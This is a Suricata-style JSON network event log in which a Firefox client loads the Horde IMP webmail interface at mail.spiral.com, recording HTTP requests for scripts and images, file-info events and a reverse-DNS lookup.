{"timestamp":"2020-02-29T00:23:13.585514+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:23:13.588348+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":6}} {"timestamp":"2020-02-29T00:23:13.588817+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:23:13.592254+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.592593+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:23:13.593849+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":4}} {"timestamp":"2020-02-29T00:23:13.592875+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:23:13.594116+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:23:13.642877+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":8}} {"timestamp":"2020-02-29T00:23:13.685357+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:23:13.744096+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":9}} {"timestamp":"2020-02-29T00:23:13.744418+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:23:13.766355+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":10}} {"timestamp":"2020-02-29T00:23:13.768362+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:23:13.770424+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":11}} {"timestamp":"2020-02-29T00:23:13.775452+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:23:13.776683+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.777482+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:23:13.777995+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":6}} {"timestamp":"2020-02-29T00:23:13.778444+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":12}} {"timestamp":"2020-02-29T00:23:13.794129+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:23:13.803596+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:23:13.804330+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.804922+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:23:13.810002+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":32775,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:13.834778+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":13}} {"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:14.000285+0000","flow_id":461862238728569,"event_type":"flow","src_ip":"192.168.10.130","src_port":34264,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2088,"bytes_toclient":1452,"start":"2020-02-29T00:22:04.110969+0000","end":"2020-02-29T00:22:09.135688+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954}} {"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.040185+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.042385+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":8}} {"timestamp":"2020-02-29T00:23:14.042940+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:23:14.055569+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:23:14.056125+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:23:14.056812+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:23:14.057009+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":9}} {"timestamp":"2020-02-29T00:23:14.057388+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":2}} {"timestamp":"2020-02-29T00:23:14.057826+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:23:14.058591+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:23:14.059277+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":3}} {"timestamp":"2020-02-29T00:23:14.060224+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":10}} {"timestamp":"2020-02-29T00:23:14.061891+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} 